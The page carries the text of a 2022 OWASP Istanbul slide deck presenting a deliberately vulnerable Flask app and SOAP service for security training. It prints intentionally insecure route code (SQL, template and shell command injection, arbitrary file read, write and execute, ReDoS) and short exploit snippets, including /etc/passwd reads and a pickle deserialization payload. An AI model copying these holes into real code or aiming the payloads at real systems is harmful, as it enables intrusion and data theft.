Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 

Recently uploaded (20)

Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 

OWASP-VulnerableFlaskApp

  • 1. OWASP – Vulnerable Flask App https://owasp.org/www-project-vulnerable-flask-app/ https://github.com/anil-yelken/Vulnerable-Flask-App Anıl Yelken 19.11.2022 OWASP İstanbul
  • 2. OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload
  • 3. OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
  • 4. OWASP – VULNERABLE FLASK APP SQL INJECTION
  • 5. OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
  • 6. OWASP – VULNERABLE FLASK APP HTML INJECTION
  • 7. OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
  • 8. OWASP – VULNERABLE FLASK APP SSTI
  • 9. OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
  • 10. OWASP – VULNERABLE FLASK APP COMMAND INJECTION
  • 11. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
  • 12. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  • 13. OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
  • 14. OWASP – VULNERABLE FLASK APP LFI
  • 15. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
  • 16. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  • 17. OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
  • 18. OWASP – VULNERABLE FLASK APP BRUTE FORCE
  • 19. OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
  • 20. OWASP – VULNERABLE FLASK APP FILE UPLOAD
  • 21. OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
  • 22. OWASP – VULNERABLE FLASK APP DOS
  • 23. OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
  • 24. OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
  • 25. OWASP – VULNERABLE FLASK APP
  • 26. VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
  • 27. VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
  • 28. VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
  • 29. VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
  • 30. VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id
  • 31. VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
  • 32. VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
  • 33. ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
  • 34. KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken